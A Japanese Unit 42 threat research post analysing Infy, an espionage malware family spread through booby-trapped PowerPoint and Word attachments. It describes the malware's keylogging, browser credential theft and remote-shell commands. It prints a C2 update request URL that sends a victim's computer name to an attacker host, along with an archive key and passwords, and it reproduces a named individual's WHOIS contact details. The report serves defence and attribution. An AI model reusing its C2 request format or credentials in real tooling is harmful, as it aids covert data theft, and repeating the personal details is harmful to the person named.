[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# プリンス オブ ペルシャ: 10年間、標的型攻撃でアクティブなInfyマルウェア

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます  
Related Products  
[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Simon Conant](https://unit42.paloaltonetworks.com/ja/author/simon-conant/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2016年5月2日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Infy](https://unit42.paloaltonetworks.com/ja/tag/infy-ja/)
  * [Microsoft](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/?pdf=download&lg=ja&_wpnonce=46edad538b "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/?pdf=print&lg=ja&_wpnonce=46edad538b "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=プリンス%20オブ%20ペルシャ:%2010年間、標的型攻撃でアクティブなInfyマルウェア&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fprince-of-persia-infy-malware-active-in-decade-of-targeted-attacks%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fprince-of-persia-infy-malware-active-in-decade-of-targeted-attacks%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fprince-of-persia-infy-malware-active-in-decade-of-targeted-attacks%2F&title=プリンス%20オブ%20ペルシャ:%2010年間、標的型攻撃でアクティブなInfyマルウェア "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fprince-of-persia-infy-malware-active-in-decade-of-targeted-attacks%2F&text=プリンス%20オブ%20ペルシャ:%2010年間、標的型攻撃でアクティブなInfyマルウェア "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fprince-of-persia-infy-malware-active-in-decade-of-targeted-attacks%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=プリンス%20オブ%20ペルシャ:%2010年間、標的型攻撃でアクティブなInfyマルウェア%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fprince-of-persia-infy-malware-active-in-decade-of-targeted-attacks%2F "Share in Mastodon")

## 概要

対象範囲がかなり限定された攻撃活動は多くの場合、何年もの間、表に出てきません。2、3のマルウェア サンプルのみが導入された場合、セキュリティ業界のリサーチャーがそれらを特定し相関できる可能性はかなり低いでしょう。

2015年5月に、Palo Alto Networks WildFireは、偽の侵害されたイスラエルのGmailアカウントからイスラエルの産業組織に送信された、悪意のあるドキュメントが添付された2件の電子メールを検出しました。一方の電子メールには「thanks.pps」という名前のMicrosoft PowerPointファイルが添付され([VirusTotal](https://www.virustotal.com/en/file/a1d5ab7125f002262151e516151e9b9223b3f5ca3863d69dd8a12b066c162906/analysis/))、他方には「request.docx」という名前のMicrosoft Wordドキュメントが添付されていました。

同時期に、WildFireは、前出のWordドキュメントと同一のハッシュで、今回はアメリカ政府の受信者に送信された、Wordドキュメント(「hello.docx」)を含む電子メールを捕捉しました。

これらのファイルのさまざまな属性と、それらがインストールするマルウェアの機能に基づいて、2007年に遡って攻撃に関与していた、私たちがInfyと呼ぶ、以前は未公開だったマルウェア ファミリの40を超える亜種を特定し収集しました。このツールを使用した攻撃は、2016年4月現在でも引き続きアクティブでした。

### **攻撃手法**

私たちが最初に特定したInfyを含む攻撃は、WordまたはPowerPointドキュメントが添付されたスピアフィッシング メールでした。添付されたドキュメント ファイルには、多層のSelf-Extracting Executable Archive (SFX:自己解凍型実行可能アーカイブ)、および受信者に実行ファイルをアクティブ化させるためのソーシャルエンジニアリングを試みるコンテンツが含まれています。この例では、PPSファイルをクリックすると、「PowerPointショー」モードが開きます。一時停止された動画を模倣したPowerPointページ(図1)が表示され、ユーザーがだまされて\[実行\]をクリックすると(図2)、埋め込まれたSFXファイルが実行されます。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-1.png)  
*図1 一時停止された動画を模倣したPowerPointページ*  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-2.png)  
*図2 ユーザーがだまされて埋め込みのSFX EXEを実行する*

SFX層のうち1層は、キー「1qaz2wsx3edc」で暗号化されています。パッケージ(図3)には、通常、カモフラージュとして偽のreadme.txtファイルが含まれ(たとえば、Aptana Studioアプリケーションになりすます)、活動によっては、イメージ ファイルや動画ファイルが含まれます(図4)。通常、実行可能ファイルのファイル名パターンはins\[\*\].exeで、ここで\*は最大4文字のランダムな数字です。メイン ペイロードは、典型的なファイル名パターンがmpro\[\*\].dllのDLLファイルです。ここで、\*は最大3文字のランダムな数字です(以前のバージョンでは、.cpl拡張子が使用されていた)。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-3.png)  
*図3 埋め込みのSFXコンテンツ*  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-4.png)

![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-4_2.png)  
*図4 一部の活動ではカモフラージュとしてイメージ ファイルや動画ファイルが含まれる*

実行可能ファイルは、DLLをインストールして、Autorunレジストリ キーに書き込み、再起動されるまでアクティブ化しません。再起動後、最初にアンチウイルスをチェックし、その後、C2へ接続します。環境データの収集を開始し、キーロガーを始動させ、ブラウザのパスワードやcookieなどのコンテンツを盗み、その後、盗んだデータをC2サーバへ取り込みます。

最初に観察された「thanks.pps」の例では、mpro324.dllという名前のペイロードDLLをロードするins8376.exeという名前の埋め込みファイルをユーザーが実行するように仕掛けられていました。

### **インフラストラクチャ**

初期のサンプルでは、C2サーバとしてupdateserver3\[.\]comとus1s2\[.\]strangled\[.\]netが観察されました。

その他の活動では、動的DNSプロバイダ、サードパーティのサイト ホスティング サービス、および明らかに第一者がC2サーバとして登録したドメインの組み合わせが使用されています。

ホスティングとWHOISデータの分析(図5)から、C2サーバとして使用するため第一者が登録した計12の関連するドメインが見つかりました。

* bestbox3\[.\]com
* myblog2000\[.\]com
* safehostonline\[.\]com
* updateserver3\[.\]com
* short-name\[.\]com
* bestupdateserver2\[.\]com
* bestwebstat\[.\]com
* updatebox4\[.\]com
* bestupdateserver\[.\]com
* short-url20\[.\]com
* updateserver1\[.\]com
* box4054\[.\]net

これらのドメインの存続期間から、一部は2010年初期にまで遡り、悪意のある活動で使用されてきたと推察されます。

私たちは、デンマーク政府を標的にした同様の攻撃を観察し、同じC2インフラストラクチャの一部をドキュメント化した[Danish Defense Intelligence ServiceのCenter for Cybersecurityによるレポート](https://fe-ddis.dk/cfcs/CFCSDocuments/Phishing%20uden%20fangst.pdf)を見つけました。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-5.png)  
*図5 Infy攻撃に関連するインフラストラクチャと攻撃者の情報*

私たちは当初、本来観察されたPowerPointファイルと同じハッシュだが、名前が異なる(「syria.pps」)ファイルが2015年5月にもVirusTotalにアップロードされたことを発見しました(図6)。これらの活動を通じて観察された特徴は、攻撃者が地域固有の攻撃コンテンツを使用して、特定の地理的地域を標的にした意図的な企みを行っている点です。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-6.png)  
*図6 異なるファイル名でVirusTotalにアップロードされたPowerpointファイル*

その後、インフラストラクチャ、ハッシュ、文字列、およびペイロード リンク、さらに類似点に基づいて、追加のマルウェアと活動を特定し関連付けることができました。これらがすべて関連付けられるもっとも決定的な証拠が、すべての例においてマルウェア内で文字列をエンコードするために使用されている単一のキーです。オフセットのみが変わります。古いバージョンではC2データのみがエンコードされますが、より新しいバージョンでは大半の文字列がエンコードされ、さらに一部のバージョンではC2データが2つの異なるオフセットでダブルエンコードされます。これらの文字列をデコードするために、次のスクリプトを使用できます。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-0.png)

関連する活動がより頻繁に観察されたのは2011年以降ですが、この特定のエンコード手法とキーに基づいて、早期の2007年中盤からの関連するInfyサンプルを特定しました。私たちが検出したもっとも古いサンプルに関連付けられたC2ドメイン、fastupdate\[.\]netの登録履歴から、それが2004年12月まで遡り、悪意のある活動に関連付けられていたものと推察されます。

長年にわたり、継続的な開発とコード内の機能の改善が行われてきたことがわかります。たとえば、最近、新しいMicrosoft Edgeブラウザのサポートが「バージョン30」で導入されました。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-7.png)  
*図7 2007年に検出されたもっとも古い関連する例*

この5年間の関連するマルウェアのサンプルの大半は、最終的にアンチウイルス プログラムによって検出されましたが、そのほとんどで汎用的な署名が使用されています。その他の例は、Win32/Tuax.A (かなり古いバージョン)、W32/ADOKOOB、Win32/Cloptern.A \& B (古いバージョン)、TR/Graftor.106254、TR/Spy.Arpnatis.A、Win32/Skeeyah.A!bitを含む、複数の無関係な署名分類によって命名されています。

私たちがマルウェアを「Infy」と呼んでいるのは、攻撃者がこの文字列を、ファイル名(「infy74f1.exe」 -- *Infyバージョン7.4 F1*)、C2文字列(「subject=INFY M 7.8」)、C2フォルダ名などの複数の場所で使用していたためです。

### **帰属**

最初に観察された攻撃で電子メールを送信したGmailアカウント(図8)は、イスラエルの被害者のものです。そのアカウント自体は、ユーザーのシステムと電子メール アカウントが侵害された電子メール経由の攻撃の被害者です。

![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-8.png)  
*図8 最初に観察された電子メール経由の攻撃*

C2インフラストラクチャで使用された第一者ドメインのWHOISレコードの中から、命名パターンに著しい類似性を持つ3つの電子メール アカウントが見つかっています。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-8_2.png)

最初の2つの電子メール アドレス(および他のC2ドメイン)を持つWHOISレコードは、一見、偽のWHOISコンテンツのように見えます。「aminjalali\_58 (at) yahoo.com」電子メール アドレスは、2010年から、6つの既知のC2ドメインに関連付けられています。偽のWHOISの例と異なり、この例のコンテンツは次の電子メール アドレスと比較的一致します。

*amin jalali*  
*safehostonline*  
*afriqa street number 68*  
*tehran*  
*Tehran*  
*19699*  
*IR*  
*+98.935354252*  
*aminjalali\_58 (at) yahoo.com*

名前「Amin Jalali」は一意ではありませんが、イラン特有の家柄であるように見えます。名前と「58」を組み合わせたプロファイルとアーティファクトは、同一人物の可能性があり(そうでない場合もあり)、すべてがイランのリンクを備えています。

既知の第一者のC2から隣接するIPアドレス上のドメインを見ると、多数のイランのドメインが観察されます。これらは、おそらく、イランのホスティング リセラー、少なくとも無料のイランの Web ホストと推測されます(図9)。  
![](https://www.paloaltonetworks.jp/content/dam/paloaltonetworks-com/ja_JP/Images/blog/Prince-of-Persia-9.png)  
*図9 イランのドメインを持つ隣接IPアドレス*

## **結論**

これらのサンプルにおけるこのマルウェアとC2インフラストラクチャの広範な分析の結果、動作パターンを結論付ける十分な証拠を得ました。活動は約10年間に渡って観察され、その間に、マルウェアは常に改善され開発されてきました。少ない活動量、意図的な攻撃目標、カスタマイズされたコンテンツ、さらに標的の性質が、この攻撃者の目的をほのめかしています。

その活動は10年間にわたりうまく気付かれずに続けられましたが、私たちは、イランに端を発する標的型スパイ活動の大半が明らかになったと確信しています。それは、複数の国の政府や企業、さらに市民までを対象としています。

Palo Alto Networksのお客様は、次の方法で脅威から保護されています。

1. WildFireは、この活動に関連するすべてのマルウェア サンプルを悪意のあるものとして正確に識別します。
2. 脅威防御によって、この活動で使用されているドメインは悪意のあるものとしてフラグ付けされています。
3. AutoFocusユーザーは、「Infy」タグを使用してこの攻撃に関連するマルウェアを確認できます。

IOCは、このレポートの付録で確認できます。

この調査におけるMaltegoによる支援に対し、Michael Scott氏に深く感謝します。

### **付録1 -- 詳細なInfyマルウェア分析**

Infyは基本的には1つのマルウェア ファミリですが、はっきりと異なる2つの亜種が観察されています。標準的な亜種の「Infy」には、マルウェアの作成者によって1～30のバージョン(1999～15999のサブバージョン)が付けられています。さらに、2013年あたりから標準的な亜種と並行して開発されたはっきり異なる亜種「Infy M」が観察されています。Infy Mは、フル機能装備の亜種で、高価値の標的向けに導入されたようです。それにはより多くの機能が含まれています。元の亜種にはリモート制御はありませんが、「M」には、C2がC2 PHPスクリプトを介してマルウェアにコマンドを発行する機能、HTTPサポート、非表示のGUIコントロール パネル、およびFTPクライアントが追加されています。

#### **Infy**

最近のInfyサンプル(バージョン30、2016年2月24日からアクティブ)の詳細な分析:

初期実行可能ファイルは、最初にインストールされているアンチウイルス プログラムをチェックします。複数の共通のAVインストール ディレクトリに対してWindows API関数「GetFileattributeA」を使用し、「file\_attribute\_directory」でポジティブな値が戻ることをテストします。Infyが見つけたAVに応じて、異なる手法を使用した悪意あるInfy DLLを中断するか、またはインストールします。クライアントAVの検出を回避し、アラートが発生するリスクを負うよりインストールをスキップするというこの気遣いは、いくらか注目に値します(比較的よく見られるサンドボックス検出手法とは対照的)。EXEはDLLをインストールし、Autorunキーに書き込み、再起動されるまで、それ以外は何もしません。

再起動時に、EXEローダーは、パラメータ/rcvで、DLLマルウェア ファイルDLLによってエクスポートされたメイン関数(以前に「start1/start2/start3」という名前の関数が観察された)を実行します(このバージョンは19の復号化オフセットを使用)。それは、自身を「cyberlink」ディレクトリにインストールします。

その後、「bak」、「csv」または「cnt」拡張子のファイルを検索します。パラメータ「/rcv」が使用された場合は、キーロガーを起動します(キーロガーはウィンドウ名「TRON2VDLLB」を使用)(GetMessageA/TranslateMessage/DispatchMessageA)。次にホットキーを登録し、クリップボード データを取得します。Get\_browser\_dataは、パスワード、フォーム、cookie、履歴を(Microsoft Edge、Internet Explorer、Google Chrome、OperaおよびFirefoxから)盗み出します。

マルウェアはHTTPを使用して5分ごとにC2に接続し、以下をポスティングします。

\<computer name\>  
\<user name\>  
dn = n1  
ver = 30  
lfolder= f  
cpuid=  
machineguid (hklm\\SOFTWARE\\Microsoft\\Cryptography\\machineguidから)  
tt= time

感染したシステムに関するデータをC2サーバへポスティングした後、マルウェアは「v30nXf1.tmp」という名前の更新ファイルを%temp%\\drvtem64.tmpにダウンロードしました。ダウンロードが成功すると、マルウェアは「OK, Downloaded \[url file\]」とログ ファイルに書き込みます。その後、再度接続し、同様の形式で、今度は「tt=」(時間)と「cpuid=」も追加してポスティングします。ダウンロードしたファイルを、パラメータ「-sp/ins -pBA5a88E」を指定してインストールします。3度目の接続で「sfolder」、「subject」が追加され、今度は「body=」パラメータでデータを取得します。

Infyの各亜種は、それが正規のソフトウェアであるように見せかけるために、ファイル メタデータを備えた特定の「カバー」カモフラージュを使用します。この場合、ファイルはソフトウェア名「Cyberlink」、「CLMediaLibrary Dynamic Link Library」という説明を使用し、バージョン4.19.9.98を示します。

#### **Infy M**

私たちは、バージョン6.1～7.8のInfy M亜種を観察しました。これらには、スクリーン キャプチャ、ドキュメント キャプチャ \& アップロード、マイクロフォン キャプチャを含む機能が追加されています。Infy Mは、次のC2コマンドをサポートしています。

ASIDLE -- アイドル  
ASDIR -- ファイルのディレクトリ リスト  
ASPUT -- ファイルのダウンロード  
ASGET -- ファイルのアップロード  
ASZIPGET -- zipとしてアップロード  
ASDELETE -- ファイルの削除  
ASRENAME -- ファイル名の変更  
ASRUN -- ファイルの実行  
ASENDTASK -- プロセスの終了  
ASZIP -- ファイルの圧縮(zip)  
ASSHELL -- リモート シェル

「M」亜種は、たいていは標準的なInfyサンプルとはまったく異なるC2サーバを使用します(ただし、ごく最近、以前は標準亜種用のC2として見られていた、C2「youripinfo.com」を使用しているバージョン7.8を観察した):

bestupdateserver\[.\]com -- 2013年12月09日に観察  
www.bestupdateserver\[.\]com -- 2013年04月26日に観察  
bestbox3\[.\]com --2015年08月25日に観察  
www.bestupdateserver2\[.\]com -- 2015年05月22日に観察  
bestupdateserver2\[.\]com -- 2014年07月16日に観察

「M」の早期バージョンである6.2の分析

Infy M亜種のバージョン6.xは、Borland hcrtfに設定されたファイルとウィンドウ名で自身をカモフラージュします。元の亜種に見られるようなローダーEXEとペイロードDLLではなく、単一のEXEを使用します。マルウェアは最初に、ウィンドウ名「Borland hcrtf 6.x」または「Macromedia Swsoc 7.x」をチェックして、被害者が既に感染しているかどうか判別するチェックを実行します。

私たちは、Infy M内で5つの非表示のGUI制御フォームを識別しましたが、そのうち1つは使用されていません。1番目のフォームには、指定可能なパラメータが3つあります。パラメータ「/ins」は、トロイの木馬をインストールします。最初にサービスを作成して起動します。Vistaより前のWindowsバージョンでは「/s」パラメータが必要です。マルウェアは、自身をインストールした後、以前のInfyインストールを削除します。これは、プロセスを終了し、%system32%、%appdata%、%appdata%\\hcrtf内のInfyファイルを削除することで実行されます(たとえば、6.1以前のファイルは、incsy32.exe、incs32.exe、ntvdn.exe、grep.exe、hcrtf.exe、grep.dll)。その後、iniファイルの名前をgrepc.iniからhcrtfc.iniに変更します。「inverse Ser32」、「grep」、「hcrtf」の各サービスを削除することで、クリーンアップを完了します。最後に、/infy/update.phpで、C2から更新ファイルをダウンロードして実行します。

/c (copy)パラメータは、レジストリ キー「run」(Windows Vista以降)または「runservices」(Windows Vistaより前のバージョン)に書き込み、マルウェアの自動起動を設定します。/s (service)パラメータは、サービスを作成して起動します(Windows Vista以降)。この時点で、マルウェアは待機し、C2からHTTP経由で発行されたコマンドを処理します(たとえば、コマンド「ASSHELL」受信時にはリモート シェルを実行する)。

2番目のフォームは、「CreateIoCompletionPort」および「ReadDirectoryChangesW」を使用して新規または変更されたドキュメント ファイルを監視します。対象とするドキュメント ファイルの種類は、.doc、.xls、.jpg、.jpe、.txt、.htm、.pgp、.pdf、.zipおよび.rarで、それらを\\Program Files\\Yahoo!\\Messenger\\Profiles\\yfsbg\\yfsbg\\3dksf.tmpにあるファイルへZIP圧縮します(パスワード「Z8(2000\_2001uI」を使用)。

3番目のフォームは、スクリーン キャプチャを取得し、それを4dksf.tmpとして「yfsbg」フォルダに保存します。スクリーンショットとドキュメントキャプチャ ファイルを、(標準的な亜種で見られるGETを使用する代わりに) POSTを使用して\<C2 server\>/infy/fms.phpへアップロードします。

4番目のフォームは使用されていません。5番目のフォームはマイクロフォン キャプチャに使用されます。

7\.xバージョンは、自身をswsoc.exe (7.4ではinfy74f1.exeの使用も見られる)として\<documents and settings\>\\all users\\application data\\macromedia\\8080\\swsoc.exeにインストールします。また、ユーザーによって開かれたドキュメントのコピーを保存するサブフォルダ「fsbg」も作成します。これらは、ファイル名としてCRC値が付加されて保存され、同じパスワード「Z8(2000\_2001uI」を使用してRAR圧縮されます。

私たちは、サーバがPHP内でエラー応答するのを観察しました。これにより、基盤となるファイル構造の一部が理解できました。

\<b\>Warning\</b\>: Cannot modify header information -- headers already sent by (output started at /home/bestupda/public\_html/infy/fms.php:115) in \<b\>/home/bestupda/public\_html/infy/fms.php\</b\> on line \<b\>116\</b\>\<br /\>(警告: ヘッダー情報は変更できません - ヘッダーは/home/bestupda/public\_html/infy/fms.php内の(/home/bestupda/public\_html/infy/fms.php:115で始まる出力)の116行ですでに送信されています)

アップグレード要求が次の構文で観察されています(ここでは、バージョン6.2～最新バージョン):

http://www.bestupdateserver.com/infy/update.php?cn=\<computername\>\&ver=6.2\&u=27/3/2016 20:37:23

### **付録2 -- 観察されたハッシュ**

この活動で観察された関連するファイルのハッシュのリストは、[こちら](https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv)で確認できます。

### **付録3 -- 観察されたInfy C2ドメイン**

analyse1\[.\]mooo\[.\]com  
best\[.\]short-name\[.\]com  
best2\[.\]short-name\[.\]com  
best2\[.\]short-url20\[.\]com  
best3\[.\]short-url20\[.\]com  
best4\[.\]short-url20\[.\]com  
best5\[.\]short-url20\[.\]com  
best6\[.\]short-url20\[.\]com  
best7\[.\]short-url20\[.\]com  
bestbox3\[.\]com  
bestupdateserver\[.\]com  
bestupdateserver2\[.\]com  
bestupser\[.\]awardspace\[.\]info  
bestwebstat\[.\]com  
bl2pe\[.\]bestwebstat\[.\]com  
box4054\[.\]net  
c1\[.\]short-url20\[.\]com  
dbook\[.\]soon\[.\]it  
dsite\[.\]dyx\[.\]comextd\[.\]mine\[.\]bz  
fastecs\[.\]netfirms\[.\]com  
fastupdate\[.\]net  
gstat\[.\]strangled\[.\]net  
lost\[.\]updateserver1\[.\]com  
lu\[.\]ige\[.\]es  
mand\[.\]pwnz\[.\]org  
myblog2000\[.\]com  
ns2\[.\]myblog2000\[.\]com  
nus\[.\]soon\[.\]it  
safehostonline\[.\]com  
secup\[.\]soon\[.\]it  
short-name\[.\]com  
short-url20\[.\]com  
update\[.\]info\[.\]gf  
updateserver1\[.\]com  
updateserver3\[.\]com  
us1\[.\]short-name\[.\]com  
us12\[.\]short-url20\[.\]com  
us13\[.\]short-url20\[.\]com  
us15\[.\]short-url20\[.\]com  
us16\[.\]short-url20\[.\]com  
us1s2\[.\]strangled\[.\]net  
wep\[.\]archvisio\[.\]com  
wep\[.\]soon\[.\]it  
wpstat\[.\]mine\[.\]bz  
wpstat\[.\]strangled\[.\]net  
www\[.\]fastupdate\[.\]net  
www\[.\]updateserver1\[.\]com  
youripinfo\[.\]com
トップに戻る

### タグ

* [Infy](https://unit42.paloaltonetworks.com/ja/tag/infy-ja/ "Infy")
* [Microsoft](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/ "Microsoft")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:Afraidgate: 主要のエクスプロイト キット攻撃がLockyランサムウェアをCryptXXXに入れ替え](https://unit42.paloaltonetworks.com/ja/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/ "Afraidgate: 主要のエクスプロイト キット攻撃がLockyランサムウェアをCryptXXXに入れ替え")

### 目次

* 

### 関連記事

* [Microsoft WSUSのリモートコード実行の脆弱性（CVE-2025-59287）、実環境における活発な悪用を確認（11月3日更新）](https://unit42.paloaltonetworks.com/ja/microsoft-cve-2025-59287/ "article - table of contents")
* [Jingle Thief: クラウドベースのギフトカード詐欺キャンペーンの実態](https://unit42.paloaltonetworks.com/ja/cloud-based-gift-card-fraud-campaign/ "article - table of contents")
* [モデル名前空間の再利用テクニック: AIサプライチェーンの基本的側面を誤用する](https://unit42.paloaltonetworks.com/ja/model-namespace-reuse/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
